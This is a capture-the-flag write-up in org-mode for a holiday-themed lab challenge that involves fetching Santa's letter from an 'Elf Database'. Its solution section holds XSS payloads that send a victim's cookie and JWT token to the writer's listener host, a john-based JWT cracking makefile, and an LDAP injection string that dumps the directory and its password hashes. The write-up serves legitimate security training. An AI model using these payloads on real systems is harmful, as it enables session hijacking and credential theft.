** Question
   :PROPERTIES:
   :CUSTOM_ID: question
   :END:

Fetch the letter to Santa from the North Pole Elf Database at
http://edb.northpolechristmastown.com. Who wrote the letter?

** Background Information
   :PROPERTIES:
   :CUSTOM_ID: background-information
   :END:

Do we know anything about this system already?

Hints:

List any useful hints here.

Blog Posts:

Are any of these useful?

- Putting My Zero Cents In: Using the Free Tier on Amazon Web Services
  (EC2)
  https://pen-testing.sans.org/blog/2017/12/10/putting-my-zero-cents-in-using-the-free-tier-on-amazon-web-services-ec2
  Spinning up an EC2 instance, but also a lot of emphasis on how to use
  SSH keys.
- Your Pokemon Guide for Essential SQL Pen Test Commands
  https://pen-testing.sans.org/blog/2017/12/09/your-pokemon-guide-for-essential-sql-pen-test-commands
  SQL basics (SELECT, WHERE, wildcards, ORDER BY, GROUP BY, COUNT)
- Exploiting XXE Vulnerabilities in IIS/.NET
  https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
  Including remote content in XML
- Why You Need the Skills to Tinker with Publicly Released Exploit Code
  https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
  Mentions Apache struts vulnerabilities, specifically CVE-2017-5638 and
  CVE-2017-9805 Code: https://github.com/chrisjd20/cve-2017-9805.py
- Go To The Head Of The Class: LD\_PRELOAD For The Win
  https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
- A Spot of Tee
  https://pen-testing.sans.org/blog/2017/12/06/a-spot-of-tee Restricted
  bash shell, and bypassing the I/O restriction with tee
- Understanding and Exploiting Web-based LDAP
  https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
  LDAP syntax, LDAP injection
- Massively Scaling your Scanning
  https://pen-testing.sans.org/blog/2017/10/25/massively-scaling-your-scanning
  masscan

** Goal
   :PROPERTIES:
   :CUSTOM_ID: goal
   :END:

What are we trying to accomplish?

** Approach
   :PROPERTIES:
   :CUSTOM_ID: approach
   :END:

Describe the thought process that we tried here. How were we able to use
the hints or the blog posts?

** Solution
   :PROPERTIES:
   :CUSTOM_ID: solution
   :END:

Summarize the reference solution that we found

My solution:

This was a multi stage exploit.

The first stage was XSS via the support request.

First I used

```
# nc -v -l -p 4444 on l2s
http -v --form --proxy=http:socks5://@localhost:32080  POST http://edb.northpolechristmastown.com/service \
uid=alabaster.snowball \
email=alabaster.snowball@northpolechristmastown.com \
message="<IMG SRC=/ onerror=\"document.location='http://10.142.0.11:4444/?cookie='+document.cookie\"></img>"
```

Then i realized the cookie didn't help, and one needed the token mentioned in the html/javascript source:

```
# nc -v -l -p 4444 on l2s
http -v --form --proxy=http:socks5://@localhost:32080  POST http://edb.northpolechristmastown.com/service \
uid=alabaster.snowball \
email=alabaster.snowball@northpolechristmastown.com \
message="<IMG SRC=/ onerror=\"document.location='http://10.142.0.11:4444/?cookie='+localStorage.getItem('np-auth');\"></img>"
```

At that point we had the token I stored in [output/jwt](output/jwt) and used jwt2john.py and john to crack it.  The makefile in output shows the process:

```
jwt.john: ../tools/jwt2john.py jwt
	python3 ../tools/jwt2john.py $(shell cat jwt) > jwt.john

john.txt: jwt.john
	john  --format=HMAC-SHA256 jwt.john
	john  --format=HMAC-SHA256 jwt.john -show > john.txt
```

Once logged in, [tools/edb.py](tools/edb.py) was used to exploit the ldap injection vuln using the search string

    name=))(department=it)(|(cn=

and by passing * as the attributes query field. With that query and all
attributes it is able to grab the entire ldap database including password
hashes.

The letter page requires a valid password, convienently a google search for santas md5 password quickly finds a valid password.

** Alternatives
   :PROPERTIES:
   :CUSTOM_ID: alternatives
   :END:

Any other, easier solutions?

** Common Pitfalls
   :PROPERTIES:
   :CUSTOM_ID: common-pitfalls
   :END:

Do we know what issue(s) people were running into?

Cracking the JWT key was tricky without the propper tools.
My first python based solution was broken.  A fixed version was too slow.
running it using pypy helped a bit, but the pyjwt library is not optimized for cracking.
https://github.com/lmammino/jwt-cracker was a bit faster, but john outperformed
everything.  The hard part was finding out how to use john to crack a jwt secret key.

** About the Challenge
   :PROPERTIES:
   :CUSTOM_ID: about-the-challenge
   :END:

How was the challenge setup? Was there a better way to secure this
system?
